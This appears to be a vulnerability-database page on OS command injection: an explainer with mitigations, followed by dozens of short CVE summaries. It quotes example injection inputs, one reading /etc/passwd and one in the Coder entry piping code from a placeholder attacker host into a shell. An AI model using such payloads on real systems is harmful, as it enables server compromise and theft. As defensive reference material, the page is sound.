Skip to main content

OS Command Injection

web CRITICAL

OS command injection occurs when an application passes unsanitized user input directly into system shell commands.

How It Works

OS command injection occurs when an application passes unsanitized user input directly into system shell commands. Instead of treating input as pure data, the shell interprets special characters as command separators or modifiers, allowing attackers to append arbitrary commands. Common injection points include system(), exec(), popen(), and backtick operators in languages like PHP, Python, and Ruby.

Attackers exploit shell metacharacters to break out of the intended command context. On both Unix and Windows, semicolons (;), pipes (|), and logical operators (&&, ||) chain multiple commands. Unix shells additionally interpret backticks and $() for command substitution, while newlines can also separate statements. For example, if an application executes ping -c 4 $USER_IP, an attacker supplying 8.8.8.8; cat /etc/passwd causes the server to run two commands sequentially.

Attacks manifest in three variants. Visible injection returns command output in the HTTP response, giving immediate feedback. Blind injection produces no direct output, requiring time-based detection (using sleep or timeout commands) or out-of-band confirmation via DNS lookups or HTTP callbacks to attacker-controlled servers. Attackers can also redirect output to web-accessible files for later retrieval.

Impact

  • Complete server compromise — execute any command with the application's privileges, often www-data or root
  • Lateral movement — scan internal networks, pivot to backend systems unreachable from the internet
  • Data exfiltration — dump databases, read configuration files containing credentials, access sensitive business data
  • Persistence mechanisms — install cron jobs, add SSH keys, deploy web shells for continued access
  • Denial of service — crash services, fill disk space, consume CPU resources
  • Supply chain attacks — modify application code or deployment artifacts to compromise downstream users

Real-World Examples

The Ivanti Cloud Service Appliance suffered CVE-2024-8190, where command injection in the administrative interface allowed unauthenticated attackers to execute arbitrary OS commands. CISA added it to the Known Exploited Vulnerabilities catalog after observing active exploitation against enterprise networks.

GitLab experienced multiple command injection vulnerabilities over the years, including issues in repository import functionality where Git URLs containing shell metacharacters were passed unsanitized to system commands, enabling remote code execution on self-hosted instances.

Network equipment frequently contains these flaws. Various Netgear routers have exhibited command injection in ping diagnostic tools, where user-supplied IP addresses were concatenated directly into shell commands without validation, granting attackers complete device control.

Mitigation

  • Eliminate OS commands entirely — use native language libraries (filesystem APIs, network functions) instead of shelling out
  • Strict input allowlisting — permit only exact matches against predefined values; validate format with regex before any processing
  • Parameterized execution APIs — use execve() or language equivalents that pass arguments as arrays, bypassing the shell interpreter completely
  • Principle of least privilege — run application processes with minimal permissions to limit compromise impact
  • Input validation — enforce expected patterns (IP addresses, alphanumeric IDs) but never rely on blacklisting metacharacters

Recent CVEs (7742)

EPSS 0% CVSS 3.8
LOW PATCH Monitor

OS command injection in Coolify's settings module allows a highly privileged attacker in a development environment to execute arbitrary shell commands on the host server by injecting metacharacters into the dev_helper_version field, which is passed unsanitized into a Docker build command. All Coolify releases prior to 4.0.0-beta.474 are affected. No public exploit code exists and no CISA KEV listing has been issued; the provided CVSS score of 3.8 (Low) accurately reflects the highly constrained exploitation prerequisites, though the underlying command injection class warrants upgrade regardless.

Command Injection PHP Docker +1
NVD GitHub
CVSS 7.8
HIGH PATCH This Week

Local privilege escalation in Linuxfabrik Monitoring Plugins (and the underlying linuxfabrik-lib Python library) lets an attacker who already controls the low-privileged nagios account execute arbitrary OS commands, typically as root. The flaw stems from the library's shell_exec() helper splitting assembled command strings on the pipe (|) character, so user-controlled plugin arguments such as restic-check's --repo can inject additional commands. Publicly available exploit code exists (a PoC is included in the vendor advisory), but the issue is not listed in CISA KEV and no EPSS score was provided.

Command Injection Privilege Escalation
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Authenticated command injection in Coolify (self-hostable PaaS) before 4.0.0-beta.471 lets any user with rights to add file storage execute arbitrary OS commands on the host. The LocalFileVolume::saveStorageOnServer routine assembles shell commands from user-controlled fs_path and parent_dir values without escaping, and submitFileStorage never validates the file-mount path before volume creation, so injected shell metacharacters run when the storage is saved. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV; risk stems from the low bar (PR:L) and full-compromise impact.

Command Injection Coolify
NVD GitHub
EPSS 3% CVSS 9.9
CRITICAL PATCH Act Now

Remote command injection in Coolify (self-hosted PaaS) before 4.0.0-beta.469 lets an authenticated user with application write permissions inject OS commands through deployment-handling fields such as dockerfile_location, achieving arbitrary code execution on the deployment host and exfiltrating secrets via deployment logs. The flaw scores CVSS 9.9 because command injection breaks out of the application context to compromise the underlying server (scope change), exposing environment variables and other applications' secrets. No public exploit has been identified at time of analysis, but the fix is available in tagged release v4.0.0-beta.469.

Command Injection RCE Coolify
NVD GitHub
EPSS 0% CVSS 4.5
MEDIUM PATCH This Month

Command injection in Pillow's WindowsViewer component (all versions prior to 12.3.0) allows arbitrary cmd.exe command execution when a user opens an image with a crafted filename containing shell metacharacters. The root cause is in WindowsViewer.get_command(), which embeds an unsanitized file path directly into an f-string and passes the result to subprocess.Popen with shell=True on Windows. No public exploit has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.

Command Injection Python Pillow
NVD GitHub VulDB
CVSS 8.4
HIGH POC PATCH This Week

Unauthenticated OS command execution in flyto-core (Python package, confirmed on 2.26.2) allows any client that can reach the HTTP MCP endpoint (POST /mcp) to run arbitrary shell commands as the server process. The JSON-RPC tools/call handler lacks the require_auth dependency present on the equivalent REST route, so an attacker can invoke execute_module against sandbox.execute_shell and reach asyncio.create_subprocess_shell with attacker-controlled input. Publicly available exploit code exists (a curl one-liner and poc.py in the advisory); there is no CISA KEV listing and no EPSS score provided, and by default the server binds to 127.0.0.1, making this a local (CVSS 8.4) issue that becomes network-exploitable only when started with --host 0.0.0.0.

Command Injection Python Authentication Bypass +1
NVD GitHub
EPSS 1% CVSS 9.1
CRITICAL PATCH Act Now

Argument injection and directory traversal in Apache Camel's camel-docling component (4.15.0 before 4.18.3) let attackers who can influence the CamelDoclingCustomArguments or path-bearing exchange headers inject unintended docling CLI flags and traversal-laden path values into the externally executed docling tool. Because the original DoclingProducer validation relied on a flag denylist and only rejected literal '../' sequences, crafted arguments could reach the subprocess and resolve files outside the intended directory, yielding high confidentiality and integrity impact but no OS command injection (ProcessBuilder uses the list form, so no shell interprets the values). There is no public exploit identified at time of analysis and the flaw is not in CISA KEV; EPSS is low (0.79%, 52nd percentile).

Command Injection Path Traversal Microsoft +2
NVD VulDB
EPSS 1% CVSS 5.5
MEDIUM POC This Month

OS command injection in create-react-app's react-dev-utils component enables remote code execution on macOS developer workstations running version 5.0.1 or earlier. The vulnerability resides in the startBrowserProcess function of openBrowser.js, which processes unsanitized input that reaches a shell invocation. A publicly available proof-of-concept exploit exists via the project's GitHub issue tracker; no vendor patch has been released and the maintainers have not responded to disclosure, leaving the entire supported version history of this widely-used but now-archived tool permanently unpatched.

Command Injection Apple Create React App
NVD VulDB GitHub
EPSS 1% CVSS 9.1
CRITICAL POC PATCH Act Now

The FileOrganizer WordPress plugin before 1.1.9, Advanced File Manager WordPress plugin before 5.4.12, File Manager Pro WordPress plugin before 2.1.1, File Manager WordPress plugin before 8.0.4 do not properly escape a parameter before passing it to a shell command when processing image operations, allowing authenticated users to perform OS Command Injection. This requires the server to have the ImageMagick convert CLI available without either the PHP imagick or GD extensions.

WordPress Command Injection PHP +4
NVD WPScan VulDB
EPSS 1% CVSS 8.5
HIGH POC PATCH This Week

Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.

Command Injection RCE Vesta
NVD GitHub VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH This Month

OS command injection in Dell PowerProtect Data Domain across four supported release tracks allows a high-privileged local attacker to execute arbitrary operating system commands. Affected versions span the main release line (7.7.1.0-8.7) as well as LTS2024, LTS2025, and LTS2026 branch releases. No public exploit code or active exploitation has been identified at time of analysis; the local access and high-privilege prerequisites substantially constrain the realistic attack surface despite the full C/I/A impact scores.

Command Injection Dell Powerprotect Data Domain
NVD VulDB
EPSS 1% CVSS 7.2
HIGH PATCH This Week

Arbitrary OS command execution in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025 and LTS2024 branches) lets a high-privileged, remotely-authenticated attacker run operating-system commands on the backup appliance by injecting special characters into an OS command context. The flaw was reported by Dell and is addressed in advisory DSA-2026-278; no public exploit identified at time of analysis and it is not listed in CISA KEV. Because it grants full command execution on a data-protection appliance, successful exploitation can compromise the confidentiality, integrity and availability of backup data.

Command Injection Dell Powerprotect Data Domain
NVD VulDB
EPSS 1% CVSS 7.2
HIGH PATCH This Week

OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025, and LTS2024 maintenance branches) lets an authenticated high-privileged remote attacker execute arbitrary operating-system commands on the appliance via improperly neutralized special characters (CWE-78). Because the attacker already holds elevated privileges, the flaw functions as a privilege-boundary and integrity break - turning administrative access into full underlying-OS command execution with high confidentiality, integrity, and availability impact. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported by Dell and fixed in advisory DSA-2026-278.

Command Injection Dell Powerprotect Data Domain
NVD VulDB
EPSS 1% CVSS 7.2
HIGH This Week

Authenticated OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus LTS2026 8.6.1.0-8.6.1.10, LTS2025 8.3.1.0-8.3.1.30, and LTS2024 7.13.1.0-7.13.1.70) lets a high-privileged remote attacker inject arbitrary operating-system commands and execute them on the appliance. Successful exploitation yields full confidentiality, integrity, and availability impact (CVSS 7.2), effectively giving an authenticated administrator command execution on the underlying OS of a backup/data-protection system. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV.

Command Injection Dell Powerprotect Data Domain
NVD VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH This Month

OS command injection in Dell PowerProtect Data Domain enables a high-privileged local attacker to execute arbitrary operating system commands on the backup appliance, achieving full command execution within the Data Domain OS (DDOS). The flaw spans the general release track (7.7.1.0-8.6) and three LTS streams (LTS2024, LTS2025, LTS2026), indicating a shared vulnerable code path across a wide version surface. No public exploit code or CISA KEV listing exists at time of analysis, and the PR:H/AV:L prerequisites meaningfully constrain real-world risk to insider threats or post-compromise scenarios.

Command Injection Dell Data Domain Operating System
NVD VulDB
EPSS 1% CVSS 6.5
MEDIUM PATCH This Month

OS command injection in Dell PowerProtect Data Domain across four version release trains allows a high-privileged remote attacker to execute arbitrary operating system commands on the appliance. Affected products span mainline versions 7.7.1.0 through 8.7 and three LTS branches, confirmed by Dell Security Advisory DSA-2026-278. No public exploit identified at time of analysis and the CVE is absent from CISA KEV; however, the high integrity and availability impact (I:H/A:H) on a backup appliance makes patching urgent for environments where backup infrastructure is shared or admin credentials are broadly distributed.

Command Injection Dell Data Domain Operating System
NVD VulDB
CVSS 8.8
HIGH PATCH This Week

Arbitrary command execution in electerm (the open-source cross-platform SSH/SFTP/terminal client) allows a malicious remote server to run OS commands on the connecting user's desktop. The flaw lives in the rmrf(), mv() and cp() helpers in src/app/lib/fs.js, which build shell command strings by interpolating attacker-influenced file paths without escaping shell metacharacters; a hostile SSH/SFTP server that serves files with crafted names can break out of the quoted argument when the victim performs a file operation. Rated CVSS 8.8; no public exploit identified at time of analysis and it is not listed in CISA KEV, so treat this as high-severity but not confirmed exploited.

Command Injection Microsoft
NVD GitHub
EPSS 2% CVSS 8.8
HIGH PATCH This Week

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.

Command Injection RCE
NVD GitHub VulDB
EPSS 1% CVSS 9.2
CRITICAL Act Now

Unauthenticated OS command injection in Notifiarr Dockwatch through version 0.6.567 lets remote attackers run arbitrary shell commands on the host and achieve full compromise, since default deployments mount the Docker socket. The root cause is an Execution-After-Redirect flaw (CWE-698) where loader.php redirects unauthenticated users but fails to call exit(), allowing the attacker to seed the required session flag and then reach shell_exec() in ajax/compose.php with attacker-controlled input. The CVSS 4.0 base score is 9.2 (VC/VI/VA all High); there is no public exploit identified at time of analysis and it is not listed in CISA KEV, though a vendor advisory and upstream fix exist.

Command Injection PHP Docker +1
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

OS command injection in the mercurial (hg) handler of openSUSE's obs-service-tar_scm source service before 0.12.4 lets an attacker who can supply a _service file inject options and shell metacharacters through the 'revision' field, achieving arbitrary code execution as the source service or as a local user checking out the service. The CVSS 3.1 base score is 10.0 (scope-changed, network vector), reflecting that malicious input is processed by the build service. No public exploit has been identified at time of analysis, though the upstream fix (openSUSE/obs-service-tar_scm PR #552) publicly discloses the vulnerable code path.

Command Injection Buildservice
NVD GitHub
EPSS 1% CVSS 8.8
HIGH PATCH This Week

Command injection in Ubiquiti UniFi OS (all builds before 5.1.19) lets a low-privileged user on the same network run arbitrary operating-system commands on the underlying host device, giving full control of gateways, recorders, and Cloud Keys. The flaw stems from improper input validation (CWE-20) and carries high confidentiality, integrity, and availability impact (CVSS 8.8). There is no public exploit identified at time of analysis, and CISA's SSVC framework rates exploitation as none, but the technical impact is total and a vendor patch is already available.

Command Injection Ubiquiti Unifi Os Server +11
NVD VulDB
EPSS 1% CVSS 10.0
CRITICAL PATCH Act Now

Improper access control in Ubiquiti's UniFi Connect Application allows a network-adjacent attacker to bypass authentication and inject arbitrary operating-system commands on the underlying host, yielding full compromise (CVSS 10.0). The flaw chains an access-control weakness (CWE-284) with command injection, so an unauthenticated attacker reachable on the network can execute code with the application's privileges and pivot beyond the app boundary (scope change). No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; EPSS data was not provided.

Authentication Bypass Ubiquiti Command Injection +1
NVD
EPSS 1% CVSS 9.9
CRITICAL PATCH Act Now

Command injection in Ubiquiti's UniFi Access Application lets a low-privileged attacker with network reach run arbitrary OS commands on the underlying host device, escaping the application into the operating system (CVSS 9.9, scope-changed). Improper input validation (CWE-20) means attacker-supplied data reaches a shell context; there is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV. Reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066.

Command Injection Ubiquiti Unifi Access Application
NVD
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Root-level command injection in OpenWrt's luci-app-travelmate/travelmate (confirmed in 2.4.5-r3, sink still present in 2.4.6-1) lets an rpcd/LuCI session holding only the luci-app-travelmate write ACL escalate to arbitrary command execution as root. The LuCI UI limits the auto-login script picker to /etc/travelmate/*.login, but that is a frontend-only check: the root-run backend reads the raw UCI 'script' and 'script_args' values, so an attacker sets script to /bin/sh with controlled arguments to run commands as root when the captive-portal auto-login branch fires. Reported by VulnCheck with no public exploit identified at time of analysis and no CISA KEV listing.

Command Injection Luci App Travelmate Travelmate
NVD GitHub
EPSS 3% CVSS 7.2
HIGH This Week

Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.

Command Injection WordPress RCE +2
NVD
CRITICAL Act Now

Remote OS command injection in Network UPS Tools upsmon (versions 2.8.3-2.8.5) allows a network-positioned attacker - acting as a man-in-the-middle on the plaintext 3493/tcp NUT protocol connection, operating a compromised upsd server, or controlling a rogue UPS device - to execute arbitrary shell commands as the upsmon service account. The vulnerability exists in the NOTIFYCMD alarm handler, where server-supplied ups.alarm text is interpolated directly into a shell command string and executed via system(), enabling injection of shell metacharacters. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the oss-security disclosure contains sufficient implementation detail to construct a working exploit.

Command Injection Microsoft
NVD VulDB
EPSS 2% CVSS 9.3
CRITICAL POC Act Now

Unauthenticated OS command injection in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) lets network-adjacent attackers run arbitrary shell commands as root through the smacfilter_conf handler in the commuos web backend. Publicly available exploit code exists (published by VulnCheck/IEATASICS), and successful exploitation grants full device takeover; the flaw carries a CVSS 4.0 base score of 9.3 but is reachable only by attackers adjacent to the device's network. No public exploit is listed in CISA KEV, so this is proof-of-concept exposure rather than confirmed active exploitation.

Command Injection M300 Wi Fi Repeater
NVD GitHub
EPSS 1% CVSS 7.0
HIGH PATCH This Week

OS command injection in AWS aws-cdk-lib lets an actor who controls a dependency version string in a project's package.json run arbitrary commands on the host executing the CDK toolchain. The flaw lives in the OsCommand helper of the NodejsFunction Docker bundling pipeline, which passes unsanitized version strings into a shell during nodeModules installation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; AWS has released a fixed version (v2.260.0).

Command Injection Docker Aws Cdk
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

Unauthenticated OS command injection in the Guardian language-system PHP application lets remote attackers run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter of text_to_subtitles.php, which is concatenated directly into a PHP exec() call. Any internet-reachable instance can be fully compromised without credentials or user interaction, and the CVSS 4.0 base score of 9.3 reflects full confidentiality, integrity, and availability loss. No public exploit identified at time of analysis, though a VulnCheck advisory and a technical gist describe the exact vulnerable code path.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in Guardian language-system's transcribe.php lets an unauthenticated remote attacker inject arbitrary shell commands through the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication or user interaction is required and the flaw yields full command execution, it maps to a CVSS 4.0 score of 9.3 with high confidentiality, integrity, and availability impact. No public exploit is identified at time of analysis, though a public gist writeup and a VulnCheck advisory document the issue.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in Guardian language-system's transcribe_amazon.php allows an unauthenticated remote attacker to run arbitrary operating-system commands on the host. The id GET parameter is concatenated directly into a PHP exec() call that shells out to a transcription job, so appending shell metacharacters (e.g. ; | `) yields command execution with the privileges of the web server. No authentication or user interaction is required (PR:N/UI:N), and a public gist reference exists that may contain proof-of-concept details, though active exploitation is not confirmed in CISA KEV.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in Guardian Language System's translate_text.php allows unauthenticated remote attackers to execute arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication is required and the CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:N, exploitation is trivial and yields full command execution in the web server's context. There is no public exploit identified at time of analysis, though a VulnCheck advisory and a public gist document the flaw.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

Unauthenticated OS command injection in Guardian language-system's speech_text.php allows remote attackers to execute arbitrary shell commands by injecting metacharacters into the id GET parameter, which is passed unsanitized into a PHP exec() call. No authentication is required (CVSS 4.0 base 9.3), giving full read/write/availability impact on the host. A referenced GitHub gist and a VulnCheck advisory document the flaw, indicating publicly available exploit details, though it is not listed in CISA KEV.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in the Guardian language-system's speechmac.php enables unauthenticated remote attackers to run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. No credentials or user interaction are required, so any network-reachable instance can be fully compromised. This is a CWE-78 flaw carrying a CVSS 4.0 base score of 9.3; no public exploit identified at time of analysis, though a referenced gist may contain proof-of-concept material.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in the Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speechmac_text.php concatenates directly into a PHP exec() call. The CVSS 4.0 base score is 9.3 (critical) with full compromise of confidentiality, integrity, and availability, and no authentication or user interaction is needed. No public exploit identified at time of analysis, though a referenced gist and the VulnCheck advisory may contain technical exploitation detail.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in Guardian language-system allows an unauthenticated remote attacker to execute arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of complex_start.php, which is passed unsanitized into a PHP exec() call. No authentication or user interaction is required, and the CVSS 4.0 score of 9.3 (Critical) reflects full compromise of confidentiality, integrity, and availability. A public gist demonstrating the flaw means publicly available exploit code exists, though it is not listed in CISA KEV.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in the Guardian language-system lets an unauthenticated remote attacker run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speech.php passes unsanitized into a PHP exec() call. Rated CVSS 4.0 9.3 (Critical) with a fully remote, no-privilege, no-interaction vector, this is a direct pre-auth RCE. No CISA KEV listing or EPSS score is present in the provided data, and no confirmed public exploit is identified, though a referenced GitHub gist and a VulnCheck advisory document the flaw.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL Act Now

OS command injection in the Guardian language-system lets an unauthenticated remote attacker execute arbitrary operating-system commands on the hosting server. The flaw arises because text.php passes the user-controlled 'id' GET parameter straight into a PHP exec() call without sanitization, allowing shell metacharacters to break out of the intended command. The CVSS 4.0 base score is 9.3 (network vector, no privileges, no user interaction); no public exploit is identified at time of analysis, though a referenced gist and a VulnCheck advisory document the issue.

Command Injection PHP
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL POC Act Now

OS command injection in Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of translate.php, which is concatenated directly into a PHP exec() call. Publicly available exploit code exists (published as a gist via VulnCheck), and the CVSS 4.0 base score of 9.3 reflects full compromise of confidentiality, integrity, and availability with no authentication or user interaction. There is no public exploit identified as actively exploited in CISA KEV, so the current risk is driven by ease of exploitation and public PoC rather than confirmed in-the-wild abuse.

Command Injection PHP Language System
NVD GitHub
EPSS 1% CVSS 9.3
CRITICAL POC Act Now

Remote code execution in Guardian language-system allows unauthenticated attackers to run arbitrary OS commands by injecting shell metacharacters into the 'id' GET parameter of subtitles.php, which is concatenated directly into a PHP exec() call invoking jobs/subtitle_rendering.php. The CVSS 4.0 base score of 9.3 reflects network-reachable, no-privilege, no-interaction exploitation, and publicly available exploit code exists (published via VulnCheck), though there is no public exploit identified as being actively used in the wild at time of analysis.

Command Injection PHP Language System
NVD GitHub
EPSS 2% CVSS 9.3
CRITICAL POC Act Now

Default-credential authentication bypass in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets attackers log in to the anyka_ipc HTTP service on port 80 using the built-in admin username with an empty password, granting full access to snapshots, live video, network configuration, and factory-level API endpoints. Because the same interface exposes a SetMAC command-injection surface, this trivial access can be pivoted toward device-level code execution. Publicly available exploit code exists (published by VulnCheck), though this CVE is not listed in CISA KEV and no active exploitation is confirmed.

Command Injection Authentication Bypass C492A W6 Wi Fi Ip Camera
NVD GitHub
EPSS 2% CVSS 8.7
HIGH POC This Week

Authenticated remote code execution in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets a logged-in attacker run arbitrary OS commands via the HTTP PUT NetSDK/Factory SetMAC endpoint. The Wireless parameter is only partially validated by sscanf(), so a value shaped as a valid MAC prefix followed by a semicolon and shell payload survives validation and is passed unsanitized into an echo command run through system(). Publicly available exploit code exists (VulnCheck), and CVSS 4.0 rates it 8.7 (High); no public exploit identified in CISA KEV, so this is not confirmed actively exploited.

Command Injection RCE C492A W6 Wi Fi Ip Camera
NVD GitHub
EPSS 1% CVSS 8.6
HIGH This Week

Authenticated OS command injection in Seiko Solutions SkyBridge MB-A100 and MB-A110 industrial LTE gateways allows an attacker who is already logged in with administrative privileges to execute arbitrary operating-system commands on the device. The CVSS 4.0 base score is 8.6 (High), reflecting full confidentiality, integrity, and availability impact once admin access is obtained, though the PR:H requirement confines exposure to authenticated administrators. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.

Command Injection Skybridge Mb A100 Mb A110
NVD VulDB
EPSS 1% CVSS 6.5
MEDIUM This Month

Unauthenticated OS command injection in Tenda AC18 v15.03.05.05 exposes the device to full remote compromise via a crafted HTTP request to the /goform/fast_setting_internet_set endpoint. The vulnerability is a second-order (stored) injection through the mac parameter - malicious payloads are written into device configuration and executed when triggered. No public exploit identified at time of analysis, though SSVC confirms a proof-of-concept exists and the attack is automatable, making mass exploitation technically feasible against internet-exposed devices.

Command Injection Tenda N A
NVD GitHub
EPSS 3% 4.1 CVSS 10.0
CRITICAL PATCH Act Now

Unauthenticated remote command injection in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets remote attackers run arbitrary OS commands as root by sending a crafted HTTP request to the debug.pl script, which processes attacker input without sanitization. Rated CVSS 4.0 10.0 and reported through CISA ICS-CERT (advisory ICSA-26-181-06); no public exploit identified at time of analysis. This is a complete-compromise primitive requiring no credentials or user interaction.

Command Injection
NVD GitHub
EPSS 3% 4.1 CVSS 10.0
CRITICAL PATCH Act Now

Unauthenticated remote code execution in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets attackers run arbitrary commands as root by sending a crafted packet to the ms_service.pl listener on TCP port 9000. The flaw was reported through CISA ICS-CERT (advisory ICSA-26-181-06) and carries the maximum CVSS 4.0 base score of 10.0; no public exploit has been identified at time of analysis, but the combination of network reachability, zero authentication, and root-level impact makes this a top-priority issue for any exposed device.

Command Injection
NVD GitHub
EPSS 2% CVSS 9.3
CRITICAL PATCH Act Now

Arbitrary code execution in Grav CMS before 2.0.0-beta.2 stems from three distinct flaw classes: PHP object injection via unsafe unserialize() of attacker-controllable data in the Scheduler JobQueue, FileCache adapter, and Session components, an OS command injection in the plugin/theme InstallCommand git clone routine, and a Twig sandbox blocklist bypass enabling server-side template injection. An attacker who can influence the serialized input can chain available gadgets to run arbitrary PHP, while the command-injection path is reachable by authenticated administrators through plugin/theme installation. No public exploit identified at time of analysis; the issues were privately reported by VulnCheck and are fixed in 2.0.0-beta.2.

Command Injection Deserialization RCE +2
NVD GitHub
EPSS 1% CVSS 8.8
HIGH PATCH This Week

Authenticated command injection in Coolify's CA Certificate management feature (all versions prior to 4.0.0-beta.464) lets any logged-in user inject arbitrary OS commands that execute as the configured SSH user on a managed server. Because Coolify requires that SSH user to be root or a docker-group member, successful exploitation yields full compromise of the managed host and every Docker container it runs. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but the low attack complexity and minimal privilege requirement make it a high-priority patch for any multi-user Coolify instance.

Command Injection Docker Coolify
NVD GitHub
EPSS 0% CVSS 6.6
MEDIUM PATCH This Month

{$command}'` invocation without sanitizing single quotes, and the user-controlled `docker_compose_custom_build_command` and `docker_compose_custom_start_command` fields are interpolated directly into that shell string. No public exploit has been identified at time of analysis, but the CVSS scope-change flag (S:C) confirms the critical container-to-host escape dimension, and the injection technique is well-understood - making the practical impact substantially higher than the reported 6.6 base score implies.

Command Injection Docker Coolify
NVD GitHub
EPSS 1% CVSS 8.4
HIGH This Week

Arbitrary OS command execution in RPG Maker MV and MZ (Gotcha Gotcha Games) is triggered when a victim loads a maliciously crafted save-file, allowing an attacker to run commands with the privileges of the game process. The flaw is a classic OS command injection (CWE-78) reported through JPCERT/JVN; no public exploit has been identified at time of analysis and it is not in CISA KEV. Because exploitation is local and requires the user to load attacker-supplied data, impact hinges on social-engineering victims into opening untrusted saves.

Command Injection Rpg Maker Mv Rpg Maker Mz
NVD VulDB
EPSS 2% CVSS 8.6
HIGH This Week

Privileged OS command injection in the AVTECH Security Corporation DGM3103SCT surveillance device lets an authenticated user of the web management console inject operating-system commands that run with root privilege (CWE-78). Disclosed via JPCERT/CC coordination (JVN28979424), it carries CVSS 4.0 base 8.6 with no public exploit identified at time of analysis. Because the CVSS vector requires high privileges (PR:H), exploitation presumes a logged-in administrative web user, but successful abuse yields full root-level device takeover.

Command Injection Dgm3103Sct
NVD VulDB
EPSS 1% CVSS 8.8
HIGH POC PATCH This Week

Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permissions execute arbitrary commands as root on managed servers. The 'network' parameter in the Destination Network Management feature is passed unsanitized into shell commands, yielding full root-level remote code execution on the host. No public exploit identified at time of analysis; the issue is fixed in 4.0.0-beta.471.

Command Injection RCE Coolify
NVD GitHub
EPSS 1% CVSS 8.8
HIGH POC PATCH This Week

Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authenticated user run arbitrary commands on the deployment host. The flaw is an OS command injection in the Nixpacks build pack: the user-supplied install_command build parameter is concatenated unsanitized into a shell command executed during the build phase, allowing escape from the build context to host-level command execution. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV, but the path to abuse is straightforward for any user who can configure a deployment.

Command Injection RCE Coolify
NVD GitHub
EPSS 1% CVSS 8.7
HIGH PATCH This Week

Root command injection in OpenWrt's LuCI web interface (luci-proto-openvpn through 0.11.1) lets an authenticated user with OpenVPN protocol configuration access run arbitrary commands as root. The flaw lives in the generateKey ubus method, where the cl_meta parameter is passed unescaped into a popen() shell call. No public exploit has been identified at time of analysis, but a vendor advisory (GHSA-pm9w-522m-8rrh) and fix commit exist, and the CVSS 4.0 score of 8.7 reflects full confidentiality, integrity, and availability impact on the affected device.

Command Injection Luci
NVD GitHub
EPSS 1% CVSS 7.7
HIGH This Week

